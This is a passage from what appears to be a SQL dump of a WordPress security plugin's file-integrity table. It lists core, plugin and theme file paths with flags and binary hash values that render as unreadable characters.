IO-3ى@�SM','',0,'?'),('m;t�<0|x��<�����','wp-includes/wp-includes/js/jquery/ui/controlgroup.min.js',0,'�##�=�F=��\\�v','�##�=�F=��\\�v','��>733hE}���z�[)�e�Z0�ߨ!�$/Ӿ�','',0,'?'),('m@���ЭB���`�','wp-content/plugins/wp-fastest-cache/images/info.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�@ʠ��o+wf#}x','b��5�N?�A�;D�oɑDŽ<��[�;�\r��_','',0,'?'),('mA�p��	1��G�U/','wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�׋�Po�v��`�','�Zu�E-�-߈��������S�C��di5$r','',0,'?'),('mA��Y����Rb|�S�','wp-includes/ms-default-constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�^�c`�ɑ�8G�G�','A77�|93����H�ˬ3A8^<���lޛ@�','',0,'?'),('mE���\\�)��o�','wp-includes/js/jquery/ui/spinner.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ļ�>O\"q��o|','=����X.�J���w`h�W+�J����t^','',0,'?'),('mTZ`xk<Y,��/Ss','wp-includes/class-wpdb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��?�g���Y�2҆','�и�7�B�������ā0��/�q�wT��[C','',0,'?'),('mY����}ɽ��?','wp-includes/js/jquery/jquery.ui.touch-punch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�m�Q4փ��]�','k>jT@���z�����՜.OB�j�0\'��t','',0,'?'),('m��-\Zm1����w��','wp-includes/js/jquery/ui/sortable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��p��а/z):�D�','�7�/�n�,�	Ox��=��n���R���VM','',0,'?'),('m�y�z̗�܊�W�M','wp-content/plugins/all-in-one-wp-security-and-firewall/css/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('m���Ƞ��}:/�Y�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/da.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�7�A<l�?���c<','��/�uعa�a?�G����/ֽ�.��#��xk','',0,'?'),('m�,��hd�͉*��3','wp-content/plugins/wordpress-seo/admin/views/tabs/social/accounts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	Ջu�L��M��Nf=','����;\r6��Q˦�9�~ٛ�8��ҌN�i','',0,'?'),('m�5�)\'��aH�\r��-','wp-includes/blocks/home-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	8>�A�Җq���:��','#)f���h��@�em��s��<|o�3','',0,'?'),('m���S� �6{~��@','wp-includes/wp-includes/widgets/class-wp-widget-archives.php',0,'�POůJ�~�l�.�J','�POůJ�~�l�.�J','�o���`|?�0�5���q����_	!-+}Q�V-�','',0,'?'),('m�5F���ɊR�Ƀy�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php',0,'	�����)<�Q2�İ��','	�����)<�Q2�İ��','Pp�y�C���W7i~��g��`�����','',0,'?'),('m��\\�~bu,��bt','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�t��N�t��W�','�1�[�n�\nQ���}�)zN�ti�����','',0,'?'),('nQ��ʒ\'�k��\"%�','wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+\r��Π;K�۔�b/�','ߠ�P x�|�ΘQ=�	���Tc�vL\n*Ȱ','',0,'?'),('n]�j7<3ISsQ�','wp-admin/images/post-formats32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t.E���5G�N\Z�v','(Z�,���Im�Y,·�ԗ��tG��������a','',0,'?'),('n[	X���}�0�','wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LL�#��\0�uD,�Y�i]','�~^���ٴ�	d��i*����W����<6��','',0,'?'),('n#�t=�\'����b]{�','wp-includes/js/tinymce/themes/modern/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U���E��|�h(Zf�','ӣ	}�ʫ�E�0�).TX��K�d~�H��NlK20','',0,'?'),('n#�z�2�I�fh,���','wp-content/plugins/wp-smushit/app/assets/fonts/wpmudev-plugin-icons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{��~Ei��f;','�d�,ud��.���_%��QI�|g�J����','',0,'?'),('n$���/(D�u�J�k','wp-content/plugins/redirection/actions/pass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[<���uBY�7�\Zlq','XH�a=�{Z�k%�����|8�q~ӂ�6�F\r','',0,'?'),('n74�� Ɗ���>��','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/ca.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`޼�lOTY��a�>�%','���G�Ԩ�\Z��.�ԈF���;�5���Tԝ�','',0,'?'),('n?��<}rm\'�eq c','wp-includes/blocks/site-title/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u{(�)��J��R��\\','�y�]����3;��Zv�D�(&�|7��cz\'�','',0,'?'),('nAj+�u��VG7d','wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nR1�՞��\n�ixBi','���S�⃧��=ȌbjK�����i�$��y�','',0,'?'),('nZ/1T:{&^�/n���','wp-admin/js/media-gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_8��5o�?�','Ƥ�$�30��I��X��C,b���\"0l�N�F','',0,'?'),('nZ�\Z�;��Ob�>3<�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/gl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q��D�\"�ѷ��m','�#��q��j�{jޛ[\'Y����QrRê�%Z`','',0,'?'),('n[m��F�񩇫-','wp-includes/wp-includes/js/jquery/ui/button.js',0,'�	��.��ȴ�fh~O','�	��.��ȴ�fh~O','Û�.�k(5S�1��!����>�^I t�ȭ���.','',0,'?'),('n[�GO�J]@ԱuY','wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.css',0,'AU�L�Y����M��','AU�L�Y����M��','�)�RfZ�����~u3����}\'�?�!>','',0,'?'),('nbLݱK�C%���H�','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-sortable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�oy��<Rq�R�v��','tekg\0fG½���sDe�)�u��X����','',0,'?'),('n��{��oh\Z��*','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/RejectedPromise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S1�~%��Y��փ�','%h=�%vOIޟ�7V��x�o���_��(','',0,'?'),('n��Cpp��%�M�','wp-includes/wp-includes/js/thickbox/loadingAnimation.gif',0,'�\"h\r�c���&�','�\"h\r�c���&�','B�F���`�F-��l�ڛ�RT6���Յ��','',0,'?'),('n�{�҄��:�P����','wp-admin/images/about-header-about.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��ɲ��!Cf�Ύ�','�;h!��z�}�)�\'�7�2y���?','',0,'?'),('n��^G��d��˶ª�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/et.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?��ca�N�>�*��','�\Z??�w\n�Ҧʗ�]�G#�,�@��;k�]�','',0,'?'),('n����@��A��F�','wp-admin/network/sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x_�h2�oߓ!G�f)-','��ۅ��B�0$MF��k}�幤Ӯ���Й��','',0,'?'),('n�|j�por:=U�','wp-content/plugins/redirection/models/url/url-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;��E��[>�m^','&�T�@�w��k�e:d�����k�~���]','',0,'?'),('n��g�N�_)�K��<X�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/cs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&\0\"�{+&sIդ','�8��K���(O�Fj��Ā�������}','',0,'?'),('n���g�7���xՏ�A','wp-content/plugins/wordpress-seo/admin/class-expose-shortlinks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\ZD6���6��m�d','��OGO����88�.e�2�n�H��)�bZ�','',0,'?'),('n�	T\r�K�E��lf�','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-control.php',0,'�@V{R#8�7n�n\n�','�@V{R#8�7n�n\n�','��a�H����Muyw?�h:�B��<=��,##�','',0,'?'),('n�N�J]f0�1�','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-fontawesome.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G>3ˁs����+�','\"�z�u���^I�W�o�:�H�*ێ\0v�]','',0,'?'),('n����ғ}�D\\\n�','wp-includes/wp-includes/widgets/class-wp-widget-custom-html.php',0,'���dz\'E�n�N��','���dz\'E�n�N��','��l.��M|yc�)�Vr�]�Ak�:Ʃ\"�A','',0,'?'),('nŢ�)�c���q^\"','wp-includes/Requests/Exception/HTTP/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�5���y:	cx2','�}��=3x�A9����l��p\0�ư�9e.O','',0,'?'),('nȵ��u:�b��fR�','wp-includes/wp-includes/js/jquery/ui/dialog.min.js',0,']2�z�L!E��,�C\Z',']2�z�L!E��,�C\Z','���|\r�Ce>�/k˪�\"E�0�݀V�L�','',0,'?'),('n�F�`np~vuTk�K','wp-content/plugins/wordpress-seo/src/helpers/indexable-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������e#  @','D�(���,2R2�S�94�NEB���p��','',0,'?'),('n�к���v�nj=ͮ','wp-admin/includes/class-bulk-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z��j�.���%��|','��p�PH;�?\0�U�+k��fr���ɫ)�|�','',0,'?'),('n��>�.��|�','wp-content/plugins/wp-smushit/app/assets/images/smush-lazyloader-1.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N\Zo/�MRE�D�Jc�','�T��Ԥ@p�?��5+U޼Q&���n`��','',0,'?'),('n,�Q���3b��O','wp-includes/js/dist/warning.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B5����jc�$��','f\"mW��\'@�Wl��7�q���d�TܹMn<��G','',0,'?'),('n�8s��Y>�!�����','wp-content/plugins/wordpress-seo/css/dist/yst_seo_score-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"��Rz�R��χ�r','�_���sM4o⯁9:���0F�X�6����d','',0,'?'),('n���0�9j�v8�\"','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ň\0�s�4�z�9�>�_�','	D+�Ĵ����!��̈́Q�������W��C','',0,'?'),('n��ۗ��vXH)�','wp-includes/sodium_compat/src/Core32/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('oܛ���Ik?W�x','wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php',0,'܇��X%�EWy�m\'��','܇��X%�EWy�m\'��','�|�\rL�ʜэ�|�Ry��6S^�\\��','',0,'?'),('o+��R�D!��. Y','wp-includes/wp-includes/css/dist/editor/editor-styles.min.css',0,'�/Ow�:#��v���\r','�/Ow�:#��v���\r',']��Ɇ���m�{�w��#ߟ^��,n����,>','',0,'?'),('o&�;�;�K��|-%1}3','wp-content/plugins/wordpress-seo/js/dist/installation-success.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`���\"Y�C�\"_','ϖ%p��~}���L�+��4�[7ep�+;a��\r0','',0,'?'),('o\'RD-��\0���o��','wp-content/plugins/wordfence/images/support.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Cl�$��r����n<.','��$�M��Ԯ�&���(ᩘs��^	Ϣ*N��','',0,'?'),('o\'��r+Ԯ�o	a','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Cookie/SessionCookieJar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_9�/�\0X��NV0��','���V����6e���a��Ƌ{9=ck� 9','',0,'?'),('o1i�L5���z�$��7','wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u1��\\�8���;#j-','P����|�l�_���Z��3z<NɧK���','',0,'?'),('oC�\"���Q���t��y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+�����%','�4!��H�:�6>�lE��Ec#���a{�A�{','',0,'?'),('oP�c����o�.�r','wp-includes/js/tinymce/skins/lightgray/img/object.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rdP�E}u\n/M�A�� ','��#;!��I��.�>�uʍ�SV��m{|�e-','',0,'?'),('oS]�~(��7;�\r�','wp-includes/js/dist/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,V!V�-G7���j�','H��?�0H�#��*�\Z�m�%C��M��	\rI','',0,'?'),('oZ0�������<c�0','wp-includes/SimplePie/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��9,�zӄycE�','Ye��k����\Zk�t~�n4�&�����p#�Ӝ','',0,'?'),('of�Gk�L����`t@','wp-includes/blocks/cover/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4��Y��+�Z��Q��','%ޒbw�f=�M�����3 ��`Z��`�8�','',0,'?'),('ot�p�]0�~�xݕ�l','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-es_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j*��J\\���\"e�g','X��Y!&R\\n��i�B+vC��i���7�','',0,'?'),('o}�C܊8�E��G�','wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E8��u�ChG<�o܅\"','�TQ��t���ݓ��z�ωT��0��A','',0,'?'),('o�;B���<��0��','wp-content/plugins/insert-headers-and-footers/views/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��`�T�4ِ�[�F\n','��@B��ʳQ�/��\'��1+6��ة�','',0,'?'),('o�{ѱ`�r��<����','wp-content/plugins/wordpress-seo/src/generators/schema/abstract-schema-piece.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W��t�	r�F��@��','�O}#��lQktG��dj���K�L�G�qEB','',0,'?'),('o���O��~3��{��K','wp-content/plugins/wp-cerber/languages/wp-cerber-ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�:�d�\'\\�V','b>BOi�E�u��C��o���;��#�֮a��;','',0,'?'),('o��z`�7�u��K�$Q','wp-includes/wp-includes/error-protection.php',0,'?5�p��.9�;F�ܧ�','?5�p��.9�;F�ܧ�','֦ �7S�\Z�\\��cdLb|o�1��Y�ã��:','',0,'?'),('o�jĎNA�ħ�Q��E','wp-includes/wp-includes/js/customize-loader.min.js',0,'�-�����#�5&*�o�','�-�����#�5&*�o�','�<ş;\r#8�+=dK���F꡻�S)8�׆>]�','',0,'?'),('o�	ǻ�	&��c���','wp-includes/blocks/paragraph/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5S�=g�����s\0֧�','�1�m����Y��H�^��O���L8�','',0,'?'),('o��u�U-g(<�O�l�','wp-content/plugins/wp-cerber/languages/wp-cerber-de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�{U��4[�$�onc','��G����R�єT`,�5sB@���l>!�','',0,'?'),('o�~\\,�F���S�?�','wp-content/plugins/wordpress-seo/src/deprecated/admin/multiple-keywords-modal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n>�ډ�q�워','�ĸb��ߴ	���j M���ӿ���hDEV�','',0,'?'),('o�w*�\nΛ΢GҜ�]','wp-content/plugins/wordfence/modules/login-security/img/header.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('o��/�������%','wp-includes/wp-includes/js/dist/is-shallow-equal.js',0,'���	�\n�f@�!릶','���	�\n�f@�!릶','wNT(��`x܌�P�C��1Ow�b�]��ъ�','',0,'?'),('o�x�jL<J����Ī?','wp-includes/wp-includes/js/tinymce/license.txt',0,'o�����x:�`����','o�����x:�`����','Y��#wO�g^\'�b��:�^�	=跨|��','',0,'?'),('oںP3\"��7]g`���','wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/images/plugins-smush.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��aT>< +L�$�','�Q�	�\'�}�9��_V�0��ώ0+E�k�\\���','',0,'?'),('o⸪e��Z�uv¬','wp-content/plugins/redirection/database/schema/240.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���a���8�J�','!g��{��Z�V.o2��Z�\Z���\n7�s�S','',0,'?'),('o㮚-�;?X:��pҡ','wp-trackback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:R���U���M�%','��\Z�W�Y�{�a��Ӳ�]e���~=UE��','',0,'?'),('o���Y��څ��X�','wp-content/plugins/wordfence/images/flags.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W7� ��(�˿!�\Z7�','Bx�0%Ly�6���!��X\\z/<�n�6=\ZW�','',0,'?'),('o�[��n3u��ʹ�P5','wp-admin/options-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���E0�H�%���|','5���#�7޿6�\'w0^�G��1�����','',0,'?'),('o�F\0$aR�/z��}','wp-content/plugins/wp-cerber/assets/flags/uy.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�t7uDNn#X�>��U�','@Z��Wiu�?�����eɻ�9{� F% ���\r`','',0,'?'),('o���˺�Ae�&���)','wp-content/themes/hitmag/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']m���n8C\"��&��5',']\"TO���92Y��ˬ\\2��k��\" L٦�','',0,'?'),('o�����S+_��:!�� ','wp-content/plugins/wp-cerber/assets/flags/gb-nir.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����H�pke�8�B�\'','�n�S��0�����AE�o\r���q��s��%���','',0,'?'),('p��7u�L�_{2Û�','wp-includes/js/jquery/ui/draggable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T�\'��ۉ�!��','��E˒�;w�\\xq��8jc�+����`�','',0,'?'),('p�� ��|����','wp-content/plugins/wp-fastest-cache/js/lang/es.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P1�˅NjF{z��u','�!�y��/��E�_����-R]�7�+ڗ�Ct','',0,'?'),('p��t@��C�F','wp-includes/blocks/template-part/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�\"�.`�Xxm{��','\n+|\'x�z���(��=j�n}#wW��i��2N','',0,'?'),('p�\0u<o���-�m��w','wp-content/plugins/wp-cerber/assets/flags/pf.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<T���,����si\'�','�8��&%�v#�̋@���:�ۄ��t�PLH��','',0,'?'),('p�?وU���\0˜','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-cronjob-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ft�öO��`�@�P','\"�MRciLa\0���]�B�B\rZ�2��','',0,'?'),('p{\r�� �%>/�Z��:','wp-content/plugins/wordfence/views/scanner/issue-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m|�&vfƲ~��','�i\"��m�$�PyM����d��	���S�','',0,'?'),('p:�,�`OlL�(�A','wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�~�H���7�<�B��','\0!�F�E���KP��7߻�0��\n;6�}��$','',0,'?'),('pU?%G\Z�J���X=`','wp-content/plugins/wordpress-seo/src/actions/indexing/limited-indexing-action-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b��!��zT½���','�?�k�,9��O#*)u����q�kk�N�','',0,'?'),('pUy�a	�b��va�;�8','wp-includes/js/comment-reply.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���D6����x�','!�x��G�����Go�Df�B8xXC�','',0,'?'),('peg�!�3�TGjq�q','wp-includes/wp-includes/js/dist/token-list.min.js',0,'��]L\'9jl7��[#�','��]L\'9jl7��[#�','�\"�Gc��iL���z5�DwN�#G��ZT{*s}�','',0,'?'),('prY��/�i��?�?��','wp-admin/images/about-header-credits.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���T��o�,Zl�','�Nk��N= ��]�٤.���2�nK����i','',0,'?'),('pw��Q�F�c�ߠb*','wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@$�qG�2k5$��z�','ֆF*`�\'�O t�riR:�j0��W\Z�=�j��','',0,'?'),('p�O��S�{r��.�r','wp-content/plugins/wp-fastest-cache/js/button.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5e�([��Ą�s	�','���`f\Z=�I��%�J��\\^��?ZϪ�V��2U�','',0,'?'),('p��@�6�}���v��9','wp-content/plugins/wp-cerber/languages/wp-cerber-vi.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\Kh=0�yJ8�K9��','�(�I���h/z�rP�M�Ջ���6v6V','',0,'?'),('p��.а��[ÍD�','wp-includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v��\\����4��yj7','^�uQ���%�`Xw�t0B<��4�V��߭:7','',0,'?'),('p��4L_�t+?M��t','wp-includes/wp-includes/class-wp-user-request.php',0,'w�?�v��\\����$','w�?�v��\\����$','z����.t(���C�o���	���tV�','',0,'?'),('p��>�n�.9f�f�','wp-content/themes/hitmag/inc/customizer/styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uG&l��v+��.�R�!','CeC	��=�������#Ƀ��:�\0\0�T��','',0,'?'),('p��\\*e�\n\rψ��','wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�cd�x�W{f��Nb','O��j+hŤ\nⵃ8Qܮ#w��_p�C���','',0,'?'),('pŧ�\n�+R�2Z��b','wp-includes/blocks/post-title/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��۩�f�m\"��Dn)3','������8�F�cXڻ���y�m���H\\�{\nC','',0,'?'),('pˑ���w��\"w:b�n','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-dropdown-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M�;B�,�k�4�','�ppoޤ�h*�DO�8\\�yq�a-{�JC�','',0,'?'),('p̓0�2@��PF�tk','wp-content/plugins/wordfence/views/common/unsubscribe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y:h3�>��a ݑ�4~','E�q����Tg��O>F-��O�(�IƚZ��z','',0,'?'),('p�:�_\Z�C�,����','wp-content/plugins/wordpress-seo/admin/class-admin-gutenberg-compatibility-notification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BrЩ_V���-q�����','k�/ܟQ�h��aOJ���:�nY�`�mʙ�Kth�','',0,'?'),('p�՟��s���xZ','wp-content/plugins/wp-cerber/assets/flags/lb.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�^�$�F��vK �','y?*T���y(�19p�a3�Pʼ��n�O�C\rS','',0,'?'),('p�q�l8Յy�Ս��','wp-content/plugins/wordpress-seo/src/actions/indexing/term-link-indexing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��gg5���Ō��','�a˚ͪR��^y~�r�D�p@��\"��d���','',0,'?'),('p�}G��J��$��x','wp-includes/block-supports/align.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a�]�4$^l��','���z�ia�;8���:��`�GW�Id��Q�\Z','',0,'?'),('p��u�w��S�ɴ0�','wp-content/plugins/hello.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��t�5\0���P��w','f��s��	u�c����~���0b����I�&5)','',0,'?'),('q\0L�S��%W=��G]','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/cssclassname.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Fb�I�Z���Ϝ]�VJ','|d؍N����`�([�lz�<�/e�^�s�/\"f','',0,'?'),('qqC��$�����@','wp-content/plugins/wordfence/views/common/page-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5��*�<�X;��','N5%��=�kUHVK�A�lEI\"3�j��','',0,'?'),('q<@s���z�ƂK��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/nb.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�\"`�#Z��x��Y@','�0�\Zyo�N8y�D\0������F���yt�','',0,'?'),('qs��A�t���d�\\','wp-includes/js/dist/warning.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�j��I�����Rd','�x>�qtQ_:��i i�k�Hg��z��Lp��)=','',0,'?'),('q��l������>�\0','wp-content/plugins/wordpress-seo/src/initializers/initializer-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���X�M��\n�/��0t�','{��b<�K��1�j�<���؀ĵi1X��̾','',0,'?'),('q\"�co���>�2Rh�]','wp-admin/includes/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ZSk[��>�R��',';a���؄-?su��\\<�{�4�I�KS�.','',0,'?'),('q%��)���ud���	�','wp-includes/blocks/buttons/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�HD���%�0�','���L�G���/ʈ\r�4�b5#<h�ϸ3�ݟ','',0,'?'),('q\'̓�|6��um����','wp-includes/wp-includes/https-migration.php',0,'�s9�4W#2��!H�߾�','�s9�4W#2��!H�߾�','2�|P��Ł�muН���~k��37rz0�x�A�','',0,'?'),('q1l�̖�^Y4hJ��\'','wp-content/plugins/wp-smushit/app/class-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F����E�v�C���%','%;��#[�,Z[�I���Z��Y�C�Օ�ɻNqO','',0,'?'),('q1�HamH Q&pR-^D�','wp-includes/blocks/image/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';\n�U�A�τfx���8','_�c}�0�KC�,w.2U�W{����t�/��','',0,'?'),('q;��\"�)���q�U��','wp-content/plugins/wordfence/css/wf-ionicons.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Al��s���j�⯃','ג��4�ˮ�v�����M�`�V��Z�','',0,'?'),('qJ|�Ц����K��aX','wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.min.js',0,'	%>�)���•;��','	%>�)���•;��','؃F��S�[k���&�f� 6+�b�>��','',0,'?'),('qL���I�Lc�','wp-includes/class-wp-recovery-mode-link-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��BW���Z �	m\r\0','t\n��_qGƵ�b�����y}�2+\0�I��','',0,'?'),('q]#6�{x�g��bf��','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/en.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4}�d�9tD$�J�','V�p#��*��Ǘ{_�+o�1�ʃ�5�X�W','',0,'?'),('qc��_���Ҳۯ�+','wp-content/plugins/wordpress-seo/src/integrations/watchers/primary-category-quick-edit-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������y>�2p�k�','()�ݙ�ۅjZ�nݙ�z�}H�T^�A\ZG�','',0,'?'),('qgژ��57�3�J: 